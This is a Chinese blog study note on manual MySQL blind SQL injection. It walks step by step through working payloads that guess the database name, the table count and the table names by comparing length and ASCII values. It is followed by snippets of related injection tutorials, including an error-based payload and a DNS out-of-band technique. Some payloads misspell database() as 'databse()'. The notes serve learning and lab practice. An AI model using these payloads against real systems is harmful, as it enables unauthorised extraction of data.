mysql 盲注手动_学习笔记 MYSQL盲注

最新推荐文章于 2025-07-28 15:51:45 发布

原创最新推荐文章于 2025-07-28 15:51:45 发布 · 262 阅读

1 ·

CC 4.0 BY-SA版权

文章标签：

#mysql 盲注手动

这篇博客详述了MySQL盲注的过程，包括猜解数据库名和表名的步骤，使用了ASCII值比较来逐步确定字符。作者通过示例展示了如何手动进行盲注，涉及到的SQL查询包括length()和ascii()等函数。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

猜解当前数据库名

输入 1 ’ and length(database())=1 # ，显示不存在；

输入 1 ’ and length(database())=2 # ，显示不存在；

输入 1 ’ and length(database())=3 # ，显示不存在；

输入 1 ’ and length(database())=4 # ，显示存在：

采用二分法猜解数据库名

输入 1’ and ascii(substr(databse(),1,1))>97 # ，显示存在，说明数据库名的第一个字符的 ascii 值大于 97 (小写字母 a 的 ascii 值)；

输入 1’ and ascii(substr(databse(),1,1))<122 # ，显示存在，说明数据库名的第一个字符的 ascii 值小于 122 (小写字母 z 的 ascii 值)；

输入 1’ and ascii(substr(databse(),1,1))<109 # ，显示存在，说明数据库名的第一个字符的 ascii 值小于 109 (小写字母 m 的 ascii 值)；

输入 1’ and ascii(substr(databse(),1,1))<103 # ，显示存在，说明数据库名的第一个字符的 ascii 值小于 103 (小写字母 g 的 ascii 值)；

输入 1’ and ascii(substr(databse(),1,1))<100 # ，显示不存在，说明数据库名的第一个字符的 ascii 值不小于 100 (小写字母 d 的 ascii 值)；

输入 1’ and ascii(substr(databse(),1,1))>100 # ，显示不存在，说明数据库名的第一个字符的 ascii 值不大于 100 (小写字母 d 的 ascii 值)，所以数据库名的第一个字符的 ascii 值为 100 ，即小写字母 d 。

猜解数据库中的表名

1’ and (select count (table_name) from information_schema.tables where table_schema=database())=1 #显示不存在

1’ and (select count (table_name) from information_schema.tables where table_schema=database() )=2 #显示存在

1’ and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1 #显示不存在

1’ and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=2 #显示不存在

…

1’ and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9 #显示存在

说明第一个表名长度为 9 。

1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>97 # 显示存在

1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<122 # 显示存在

1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<109 # 显示存在

1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<103 # 显示不存在

1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>103 # 显示不存在

说明第一个表的名字的第一个字符为小写字母g。

MySQL学习笔记-MySQL体系结构总览

MySQL体系结构总览不管是用哪种数据库,了解数据库的体系结构都是极为重要的.MySQL体系结构主要由数据库和数据库实例构成. 数据库:物理操作系统文件或者其它文件的集合,在mysql中,数据库文件 ...

由sqli-labs/Less-5学习各种基础盲注技巧

本文为本人在学习中的总结,仅涉及基础的盲注技巧,可能多有疏漏之处,欢迎指教. 另外本人博客的SQL注入分类下有一些方面的详细讲解,在此只介绍简单的使用. 0x00.介绍一下本人对盲注的总结. 盲注就是 ...

从零开始学安全(三十五)●mysql 盲注手工自定义python脚本

import requests import string #mysql 手动注入通用脚本适用盲注可以跟具自己的需求更改 def home(): url="url" list ...

利用DNS日志进行MySQL盲注

0x01 技术原理这里是利用load_file这个函数利用smb请求方式请求域名机器下的一个文件,由于计算机对该域名不熟悉所以需要优先请求DNS,所以我们通过DNS日志记录中的内容来获取回显.解决了 ...

mysql盲注学习-1

mysql: 1.left() //left()函数 left(a,b)从左侧截取a,的b位 2.mid() //mid()函数参数描述 column_name 必需.要提取字符的字段. star ...

MySQL数据库学习笔记----MySQL多表查询之外键、表连接、子查询、索引

本章主要内容: 一.外键二.表连接三.子查询四.索引一.外键: 1.什么是外键 2.外键语法 3.外键的条件 4.添加外键 5.删除外键 1.什么是外键: 主键:是唯一标识一条记录,不能有重复 ...

Java学习笔记——MySQL的安装使用以及SQL语法简介

在 Java 的开发中,数据库的应用是非常必要的,下面,我们为Java对于数据库的应用做一些必要的准备工作.. Java 对数据库的应用统称为 JDBC. JDBC(Java Data Base Co ...

MySQL学习笔记-MySQL数据库优化实践[转]

最近一段时间,我们整理了一些关于Percona,Linux,Flashcache,硬件设备的优化经验,分享给大家: 硬件 1.开启BBWC RAID卡都有写cache(Battery Backed W ...

学习笔记 MYSQL报错注入(count()、rand()、group by)

首先看下常见的攻击载荷,如下: select count(*),(floor(rand(0)*2))x from table group by x; 然后对于攻击载荷进行解释, floor(rand( ...

随机推荐

不允许调用库函数，也不允许使用任何全局或局部变量编写strlen函数

不允许调用库函数,也不允许使用任何全局或局部变量编写strlen函数. 这是一道面试题,可以使用递归的方式解答,答案如下: #include int mylen(cha ...

直播开始：&&num;39&semi;云榨汁机&&num;39&semi;诞生记--聊聊JavaScript中的&&num;39&semi;业务建模&&num;39&semi;

闭包是JavaScript中的一个重要特性,在之前的博文中,我们说闭包是一个'看似简单,其实很有内涵'的特性.当我们用JavaScript来实现相对复杂的业务建模时,我们可以如何利用'闭包'这个特性呢 ...

Hanoi

递归解决汉诺塔 class Han{ int num; int steps; Han(int num){ this.num=num; } void total() { System.out.prin ...

Sum

Problem Description XXX is puzzled with the question below: 1, 2, 3, ..., n (1<=n<=400000) are ...

python浮窗

import wx; app = wx.App(); win = wx.Frame(None,title="老穆视频",pos=(900,20),size=(300,60),sty ...

基于贝叶斯优化的超参数tuning

https://arimo.com/data-science/2016/bayesian-optimization-hyperparameter-tuning/ 贝叶斯优化:使用高斯过程作为代理函数, ...

Github中展示demo

原文链接http://www.jianshu.com/p/75e30889e70a 第一步:找到Settings,点击第二步:找到githubPages点击none,切换到master branch ...

yum groupinstall报错，处理方法

http://www.cnblogs.com/xiaoluo501395377/archive/2013/05/21/3089970.html ===== 创建repo库 # createrepo - ...

ubuntu中rc&period;local无效

在ubuntu中写了一点iptables规则,但是,竟然iptables竟然无效,经过多方查找问题...眼泪... 终于发现是rc.local竟然没有运行,我晕.仔细检查iptables脚本n遍,没有 ...